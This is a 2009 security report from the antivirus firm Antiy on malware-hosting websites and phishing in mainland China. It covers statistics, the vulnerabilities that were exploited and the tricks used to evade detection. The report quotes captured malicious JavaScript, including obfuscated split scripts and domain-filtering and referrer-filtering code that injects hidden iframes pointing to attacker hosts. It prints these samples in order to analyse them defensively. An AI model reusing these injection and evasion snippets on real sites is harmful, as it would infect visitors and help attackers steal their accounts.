网络信息安全是一个博大精深的技术体系,安天将自己的注意力专注于主要矛盾,即计算机网络病毒问题。
    根据有关机构统计,全球超过80%的安全事件均与病毒有关,网络病毒是信息社会面临的主要安全挑战之一,因此,安天人将“天下无毒”作为自己追求的安全境界。
    安天将网络安全工作者的宏观视野与反病毒工程师的成熟细腻有机结合。将反病毒技术与网络监控技术、计算机犯罪取证技术、安全评估技术等进行了有机的结合,形成了自身的产品内涵。
  当前位置:首页 - 安全响应中心 -> 病毒预警

2009年中国大陆地区网络安全报告
( PDF报告下载 ) {PDF文档阅读软件下载}

一、2009年挂马数据统计

1、挂马网站统计

    2009年共拦截恶意网站6,550,000个,以8月拦截最多830,000个。因为挂马网站访问量的大小会直接导致中木马机率的高低,所以现在挂流量大的网站已成为新的趋势。在统计中出现5月与8月两个高峰期后,渐渐表现出回落趋势。


2、恶意网站的地域分布

    2009年,中国大陆地区挂马网站的地域分布,经统计绝大部分来自于广东省,占总比例的15%;其次是江苏、浙江等地,也占了不少份额;北京,由于特殊的地位,紧随其后,占了总比例的9%;其他省、直辖市共占了总比例的24%。


3、恶意网站域名统计

    2009年对恶意网站域名统计来看,顶级域名以“.cn”为主,其次是“.org”、“.com”。从恶意域名Top10表中可以看出,70%的恶意网站都分布在我国的广东地区。此外,在美国地区的恶意域名“3b3.org”、“3bomb.com”,也占有很大的比例。

    恶意域名有着时效性,挂马者会经常更换恶意域名,为了防止安全厂商将其收录为黑名单后,减少网马的传播范围,或是有关机关将其封杀,阻断它的传播。
    经长期对恶意链接的跟踪分析发现,一些恶意链接的域名极其相似,其中只有一个字符(数字、字母)在变化,很显然是同一个挂马团伙所为。下表列出一些典型的相似域名,其中,“*”代表一个字符(数字0-9)。

4、挂马利用漏洞总结

    纵观2009年挂马漏洞利用方面,Adobe Flash由于它的重要性,一直贯穿始终;MS06-014作为老网马典型的一员,也从未被遗弃。以7月份出现的MS09-032网马出现为分界线,7月份之前,挂马漏洞利用方面,主要以MS06-014、MS08-041、MS09-002、暴风影音、联众世界、RealPlayer漏洞为主;7月份之后,主要以MS06-014、MS09-002、MS09-032、MS09-043、Flash漏洞、PDF漏洞为主;其它一些新老漏洞时而会出现在集成网马中。


5、利用网马传播的木马

    木马传播的途径有很多,可以利用U盘,电子邮件、通讯软件等途径进行传播,然而利用最多而且最有效的就是利用挂马网站进行传播;经统计,2009年通过挂马网站传播的木马以网游盗号类木马居多,其次是木马下载器、后门等病毒程序,可见挂马者目的性很强,纯粹为了金钱利益。


6、挂马网站分类

    挂马在不同类的网站占比也是不同的,在2009年被挂马网站分类对比图中列出了各个不同类的网站占比。其中以娱乐网站占比最多为23%,教育网站占比16%排在第二位。这两类网站人们关注范围大,点击次数多,直接促使网马的占比提升。


7、2009年大站挂马

    下面是2009年最具有影响力的挂马网站,知名网站的流量大,正是挂马者最看重的原因。一旦对知名网站挂马成功,那么木马的传播量与传播速度则会相当惊人。在下述列表的大站中,还有在一年内多次出现挂马情况的,这里并未一一列出。


8、2009年高校挂马

    这仅仅是众多被入侵网站中造成影响较大的几个例子,而自从国内有互联网之初,各种入侵高校网站的黑客就层出不穷,根据国内著名安全机构安天实验室的一份高校黑客入侵统计显示,国内121个重点大学和487个普通大学中,86%的高校网站曾因为存在漏洞而遭到黑客入侵,他们并不会因为自己是名牌大学,甚至是计算机网络相关专业而幸免于外。

二、2009年出现的网马及事件追踪

1、MS09-002漏洞

    2009年2月10日,微软官方在安全公告发布MS09-002,Internet Explorer 7含有远程溢出漏洞,随后利用MS09-002漏洞的网马大规模爆发,被广泛应用于挂马中。
典型案例:2009年4月15日,中国科学院计算机网络信息中心(http://www.cnic.ac.cn/query/thesis/Details.asp?txtRecordNO=11),被黑客植入恶意代码,黑客利用的网马中便包含MS09-002漏洞


2、暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞

    2009年4月30日,暴风影音被爆有远程溢出漏洞,受影响版本有暴风影音2.7/2.8/2.9,在5月份大规模爆发,被广泛应用于挂马中。
    典型案例:2009年5月15日,上海热线(http://isp.online.sh.cn/),被黑客植入恶意代码,黑客利用的网马中便包含暴风影音漏洞。


3、中国游戏中心游戏大厅 (CGAgent.dll)ActiveX远程栈溢出漏洞

    2009年4月30日,中国游戏中心游戏大厅爆有远程溢出漏洞,受影响版本有中国游戏中心游戏大厅2009,随后被黑客应用于挂马中,不过只是昙花一现,很少被黑客应用到挂马中。
    典型案例:2009年6月22日,新浪网宠物频道(http://pet.sina.com.cn),被黑客植入恶意代码,黑客利用的网马中便包含中国游戏中心游戏大厅漏洞。


4、MS09-032漏洞

    2009年7月14日,微软官方在安全公告发布MS09-032,Microsoft DirectShow被爆有远程溢出漏洞,被黑客广泛应用于挂马中。
    典型案例:2009年7月30日,39健康网(http://sex.39.net/xxl/fqxxl/084/2/278466.html)页面,被黑客植入恶意代码,黑客利用的网马中便包含MS09-032漏洞。


5、MS09-043漏洞

    2009年8月11日,微软官方在安全公告发布MS09-043,Microsoft Office Spreadsheet ActiveX控件含有远程溢出漏洞,此漏洞在7月份已经被广泛应用挂马中。
    典型案例:2009年8月12日,搜狐留学频道(http://liuxue.sohu.com/sgp/),被黑客植入恶意代码,黑客利用的网马中便包含MS09-043漏洞。

三、网马反检测手段

    杀毒软件在与网马不断较量中逐渐成熟,挂马者也从未停歇前进的步伐,他们不断挖掘新的漏洞,使用新的反检测手段,以逃避杀软的查杀。网马反检测除了普遍的加密、变形、混淆技术采用了挂马者认为更有效的手段来实践于挂马。本节从以下3个方面介绍下目前网马流行的反检测手段。

1、多脚本拼接

    挂马者为了防止杀软对网马检测,通常会使用多层跳转链接,最后跳转真正的网马页面;还会通过对单个网马恶意代码用多个脚本拼接来达到反查杀目的。
案例举析:
    2009年10月21日,安天实验室发现,天涯社区-天涯美食(http://food.tianya.cn/diy/view_info.jsp?
idWriter=0&key=0&changeProvincePid=22&changeCityPid=64&articlePid=17508&channelPid=1)页面,被黑客植入恶意代码。
利用MS06-014漏洞传播的网马主页面部分代码:

<SCRIPT LANGUAGE="JavaScript">
<!-- Hide
function killErrors() {
return true;
}
window.onerror = killErrors;
// -->
</SCRIPT>
<script src=14.js></script>
<script src=15.js></script>
<script src=17.js></script>
<script src=16.js></script>
<script src=18.js></script>
<script language="JavaScript">
……

其中嵌入5个JS脚本页面,链接如下:
14.js
15.js
16.js
17.js
18.js
14.js页面代码:


YTJJH='http://d.iopqw.com/xx/x16.css';     注:利用MS06-014漏洞传播的木马链接

15.js页面部分代码:


var yyyyy="\x53";
var JJJHHHHHFaaaa="o";
var JJJHHHHHFaaa="d";
var JJJHHHHHFaa="\x41";
var YTavp32=JJJHHHHHFaa+JJJHHHHHFaaa+JJJHHHHHFaaaa;
……

16.js页面部分代码:


var ssssllk="s";
var AASSYTA1=ssssllk+"o"+"f";
var PPDDD="M";
var AASSYTA=PPDDD+DDDDPP;
var XXXPP="t.";
……

17.js页面部分代码:


var YuTs="Ap"+"pl"+"ic"+"ati"+"o"+"n";
var YuTx=YuT+YuTs;
var nod3232="c"+"L";
var BBBCCCY="W"+"ri"+"te";
var SSSSKKKWU="c"+"re"+"at"+"eE"+"le"+"me"+"nt";
……

18.js页面代码:


var YTJJHee=nod3232+"s"+"id:";
var YTJJHees="0-"+"9"+"8"+"3"+"A"+"-"+"0";
var YTJJHeess="0"+"C"+"0"+"4";
var YTJJHeesss="F"+"C"+"2"+"9"+"E"+"3"+"6";
var YTJJHeex="BD"+"96C";
var YTJJHeexx="556"+"-65A3"+"-11D";
var YTJJHeex=YTJJHee+YTJJHeex+YTJJHeexx+YTJJHees+YTJJHeess+YTJJHeesss;
注:还原后对应MS06-014漏洞的CLSID值:BD96C556-65A3-11D0-983A-00C04FC29E36

2、判断域名挂马

    2009年5月份,常会发现一些含有“.edu.cn”、“.gov.cn”域名的网站,内部被嵌入恶意代码,却不中马的情况,在分析其中代码后,才窥得其中究竟,原来是挂马者为了规避政府、教育类网站,在域名上动了手脚。
案例举析:
    2009年5月22日发现宽甸满族自治县石湖沟乡人民政府网站(http://www.lnkd.gov.cn/shg/zsview.asp?NewsID=252&classID=7),被黑客注入恶意链接(http://3b3.org/c.js)。
http://3b3.org/c.js的代码分析:

var s,siteUrl,tmpdomain;                        //定义变量
var arydomain = new Array(".gov.cn",".edu.cn"); //定义数组变量,并把.gov.cn、.edu.cn赋值给数组变量
s = document.location+"";                       //返回调用http://3b3.org/c.js页面的url
siteUrl=s.substring(7,s.indexOf('/',7));        //获取字符串“www.lnkd.gov.cn”
tmpdomain = 0;                                  //设置开关变量tmpdomain,并赋初值为0
for(var i=0;i<arydomain.length; i++)           //遍历数组成员
{
if(siteUrl.indexOf(arydomain[i]) > -1){        //判断数组成员“.gov.cn”、“.edu.cn”是否在“www.lnkd.gov.cn”中                                           
tmpdomain = 1;                                 //如果在,那么将tmpdomain值赋为1
break;                                        //退出循环体
}
}
if(tmpdomain == 0){         //如果tmpdomain = 0,也就是说在“www.lnkd.gov.cn”中没有找到“.gov.cn”、“.edu.cn”
document.writeln("<iframe src=http://4y553r7.8866.org/a/a100.htm width=0 height=0></iframe>");
//那么将写入并以不显示窗口的前提下打开恶意网站链接(http://4y553r7.8866.org/a/a100.htm)。

    从上面代码我们可以知道挂马集团对于政府和教育网站采取了屏蔽措施,政府和教育网站对于挂马集团的意义不大,由于网站有访问用户的原因,在国内挂马的目的主要还是为了盗取游戏账号、网上交易账号等,所以常常挂马集团选择商业网站、游戏网站和大流量网站等。我们在这点也可以看出挂马集团为了保障其整体黑色产业链中挂马效率的问题,放弃了一些价值比较低的网站,而且这也可以有效的提高其网马及其网马链接的存活周期。

3、搜索引擎成为网马“传播途径”

    2009年7月份,会发现一些被挂马网站页面含有恶意代码,直接访问,却不中马的情况,只有此网站的链接被某些特定的搜索引擎收录,而且通过这些搜索引擎搜索出该链接,点击链接进入该网站时才会中马。经过分析,发现黑客是为了增加挂马的隐蔽性,采取的曲线挂马方式,用来躲避反病毒厂商的蜜罐检测。
    2009年7月30日上午8时,安天实验室发现,39健康网(http://sex.39.net/xxl/fqxxl/084/2/278466.html),被黑客植入恶意代码,追踪线索,发现39健康网其中的“http://images.39.net/js/art_tips.js”中包含“http://disk.e165.com/new.js”页面,便利用搜索引擎“传播网马”的情况出现。
http://disk.e165.com/new.js代码分析:

var url=document.referrer;  
var p=url.toLowerCase().indexOf("www.baidu.com","search.cn.yahoo.com","www.soso.com","search.114.vnet.cn",
"zhidao.baidu.com","seek.3721.com","www.sogou.com","www.google.cn");  
if (p>0)
{
document.writeln("<iframe src=http:\/\/killcctv.9966.org\/3\/4.htm?03 width=111 height=0 border=0><\/iframe>");

代码解析:只有“http://images.39.net/js/art_tips.js”链接被“www.baidu.com”、“search.cn.yahoo.com”、www.soso.com”、“search.114.vnet.cn”、“zhidao.baidu.com”、“seek.3721.com”、“www.sougou.com”、“www.google.cn”等搜索引擎任意一家收录,并通过这些搜索引擎搜索出该链接,点击链接进入该网站时才会中马。


四、钓鱼网站

    钓鱼网站,有着与正常网站极其相似的域名,模拟正常网站的界面,以迷惑用户,通过手机、通讯软件、电子邮件等方式,用来散播虚假的中奖信息,通过用户提交的敏感信息、银行汇款等途径,来谋取非法利益。
    网络钓鱼作为网络上一些不法者谋求利益的手段,已经深入社会上各个领域。由于钓鱼网站的危害性,早在2008年,就由国内银行证券机构、电子商务网站、域名注册管理机构、域名注册服务机构、专家学者等组成了“中国反钓鱼网站联盟”;各家安全厂商针对钓鱼网站,纷纷更新自己的产品,通过技术手段把检测钓鱼网站添加到自己的产品中,已经有效的遏制住一部分钓鱼网站的蔓延。在2009年,安天实验室截获的钓鱼网站数量,要远远高于去年,可见网络钓鱼带给黑色产业链多少利益。

1、飞信“非常6+1中奖短信”钓鱼事件

    2009年10月,安天实验室接到用户举报,飞信常收到这样的中奖信息,内容是:“尊敬的飞信用户:您好!恭喜您在CCTV[非常6+1]活动中被后台系统抽中,请速登录活动官网(www.cctv2fetion.com)查您的巨额奖,凭验证密码【9188】填写详细资料领取。”
打开(http://www.cctv2fetion.com),出现如下画面。

不法分子首先盗用他人飞信账号,然后向其好友发送诈骗信息,谎称用户获得高额奖金或奖品,从而诱骗用户访问钓鱼网站,并通过要求用户输入验证码、提供咨询电话、提供公证书查询等手段使得骗局更具迷惑性。

2、skype钓鱼事件

    2009年12月3日,安天实验室根据用户举报,某些skype用户收到如下中奖消息:

    用户如果访问该网站,按照网站提示填写信息,会导致用户丢失敏感信息。以至于受到经济损失。
Skype仿冒页面:

    用户填入由skype用户名以及收到的验证码登陆后,就会掉入奖品诱惑的圈套当中。此仿冒网站制作相当逼真,域名也比较相近,使用户降低警惕性。

五、2010年恶意网站趋势预测

    “挂马”与“钓鱼”为黑色产业链带来巨大的利润,面对这两大网络公敌,虽然不乏有好的安全产品出现,但仍旧不能有效阻止它们的传播。预计在2010年,挂马与钓鱼方面只增不减。
    网马在与杀毒软件不断抗争中,挂马团伙依旧会不断挖掘新的漏洞,利用新的防检测手段逃避杀软的查杀;还会继续跟踪热点事件,选择流量大的网站进行挂马,以促使网马广泛的传播。
    钓鱼方面,黑客更加隐蔽、逼真的传播钓鱼网站,通过即时通讯软件、电子邮件、手机短信等方式,揣摩用户的心理,利用社会工程学,对用户进行欺骗。
    2010年2月份,一年一度的春节又将来临,届时,春节的到来让旅游、购物、票务网站等的访问量大幅上升,也给挂马者提供了一个很好的机会。谨提醒广大用户,增加网络安全防范意识,安装防线2009,以规避安全风险。

注:本报告旨在对中国大陆地区网络安全分析,具体信息安全威胁综合报告请见“安天实验室信息安全威胁综合报告”
报告链接地址:http://www.antiy.com/cn/security/2009/antiy-security-report-2009.htm